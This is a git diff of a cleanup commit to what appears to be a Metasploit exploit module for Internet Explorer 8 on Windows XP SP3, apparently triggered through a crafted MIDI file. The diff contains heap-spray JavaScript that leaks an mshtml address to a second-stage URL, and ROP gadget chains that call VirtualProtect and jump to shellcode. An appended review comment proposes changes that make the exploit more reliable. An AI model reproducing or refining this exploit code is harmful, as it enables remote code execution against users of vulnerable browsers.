Final cleanup
parent
4c58991c89
commit
3c398d0e62
|
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
false, "MSHTML Build Version", '',
|
||||
[
|
||||
'',
|
||||
'', #Default (no leaky leaky)
|
||||
'8.0.6001.18702', #newly installed Win XP SP3 non patched
|
||||
'8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011
|
||||
]
|
||||
|
@ -225,7 +225,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
m << [tc.length].pack('N')
|
||||
m << tc
|
||||
|
||||
|
||||
#midi_name = "test_case.mid"
|
||||
midi_name = rand_text_alpha(5) + ".mid"
|
||||
|
||||
|
@ -491,30 +490,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Redoing the feng shui if fails makes it reliable
|
||||
def js_trigger_fn_leak(my_target)
|
||||
|
||||
js_trigger = ""
|
||||
|
||||
if my_target.name == 'IE 8 on Windows XP SP3'
|
||||
js_trigger = <<-JSTRIGGER
|
||||
function trigger(){
|
||||
//alert('trying the trigger');
|
||||
var k = 999;
|
||||
while (k > 0) {
|
||||
if (typeof(clones[k].w1) == "string") {
|
||||
//alert('uaaa');
|
||||
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
|
||||
//alert(leak);
|
||||
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
|
||||
return;
|
||||
}
|
||||
k = k - 2;
|
||||
}
|
||||
//alert('retry');
|
||||
feng_shui();
|
||||
document.audio.Play();
|
||||
}
|
||||
JSTRIGGER
|
||||
|
||||
end
|
||||
|
||||
return js_trigger
|
||||
|
@ -569,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x4b601, # RETN (ROP NOP) [mshtml.dll]
|
||||
0x33fbc6, # POP EAX # RETN [mshtml.dll]
|
||||
:nop,
|
||||
0x52c718, # PUSHAD # RETN [mshtml.dll]
|
||||
0x52c718 # PUSHAD # RETN [mshtml.dll]
|
||||
]
|
||||
|
||||
when 0xbf190
|
||||
|
@ -584,27 +576,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:junk,
|
||||
:junk,
|
||||
:junk,
|
||||
0x1318, #0x63581318, # ptr to &VirtualProtect() [IAT mshtml.dll]
|
||||
0x48b440, #0x63a0b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
|
||||
0x3dc745, #0x6395c745, # POP ESI # RETN [mshtml.dll]
|
||||
:neg, #0xffffffff
|
||||
0x2fb18b, #0x6387b18b, # INC ESI # RETN [mshtml.dll]
|
||||
0x35190d, #0x638d190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
|
||||
0x4aada7, #0x63a2ada7, # POP EBP # RETN [mshtml.dll]
|
||||
:junk, #Compensates RETN
|
||||
:junk, #Compensates RETN
|
||||
0x1ffc54, #0x6377fc54, # & jmp esp [mshtml.dll]
|
||||
0x4498a7, #0x639c98a7, # POP EBX # RETN [mshtml.dll]
|
||||
0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll]
|
||||
0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
|
||||
0x3dc745, # POP ESI # RETN [mshtml.dll]
|
||||
:neg, # 0xffffffff
|
||||
0x2fb18b, # INC ESI # RETN [mshtml.dll]
|
||||
0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
|
||||
0x4aada7, # POP EBP # RETN [mshtml.dll]
|
||||
:junk, # Compensates RETN
|
||||
:junk, # Compensates RETN
|
||||
0x1ffc54, # & jmp esp [mshtml.dll]
|
||||
0x4498a7, # POP EBX # RETN [mshtml.dll]
|
||||
:ebx, # 0x00000800: 0x00000201-> ebx
|
||||
0x24cce4, #0x637ccce4, # POP EDX # RETN [mshtml.dll]
|
||||
0x24cce4, # POP EDX # RETN [mshtml.dll]
|
||||
:edx, # 0x00000040-> edx
|
||||
0x158306, #0x636d8306, # POP ECX # RETN [mshtml.dll]
|
||||
0x535098, #0x63ab5098, # &Writable location [mshtml.dll]
|
||||
0x1cf217, #0x6374f217, # POP EDI # RETN [mshtml.dll]
|
||||
0xa0001, #0x63620001, # RETN (ROP NOP) [mshtml.dll]
|
||||
0x349f9b, #0x638c9f9b, # POP EAX # RETN [mshtml.dll]
|
||||
:nop, #nop
|
||||
0x2afbe8 #0x6382fbe8, # PUSHAD # RETN [mshtml.dll]
|
||||
0x158306, # POP ECX # RETN [mshtml.dll]
|
||||
0x535098, # &Writable location [mshtml.dll]
|
||||
0x1cf217, # POP EDI # RETN [mshtml.dll]
|
||||
0xa0001, # RETN (ROP NOP) [mshtml.dll]
|
||||
0x349f9b, # POP EAX # RETN [mshtml.dll]
|
||||
:nop,
|
||||
0x2afbe8 # PUSHAD # RETN [mshtml.dll]
|
||||
]
|
||||
end
|
||||
|
||||
|
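Review bot: In the js_trigger_fn_leak hunk, `trigger()` retries `feng_shui(); document.audio.Play();` without any bound whenever no string-typed `clones[k].w1` is found, so a target whose heap layout never yields the leak will spin (re-spraying and re-playing the MIDI) until the tab hangs or crashes rather than failing cleanly; a cap such as `if (++attempts > 5) return;` just before the `feng_shui();` call would keep the "retry makes it reliable" behaviour of the comment above the def while bounding it. The leaked value is also sent as-is in `"?#{@leak_param}=" + leak` with no sanity check (zero or garbage from a partly overwritten string will just crash the client on the ROP stage), so it is worth a comment there — and a check on the second-stage handler — that the value is expected to be a non-zero mshtml pointer; since the ROP chains in the later hunk are mshtml-relative offsets, a bad leak means every gadget address is wrong. The scan `k = 999 ... k = k - 2` only inspects odd slots; if that is intentional because of how the spray alternates, a one-line comment such as `// odd slots hold the candidate leaking string (see feng_shui spray order)` would save the next reader from assuming an off-by-one. The closing `end` of js_trigger_fn_leak lies outside the hunk, and this hunk mixes old and new lines (seven removed), so the notes apply to whichever of these lines survive on the new side.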
|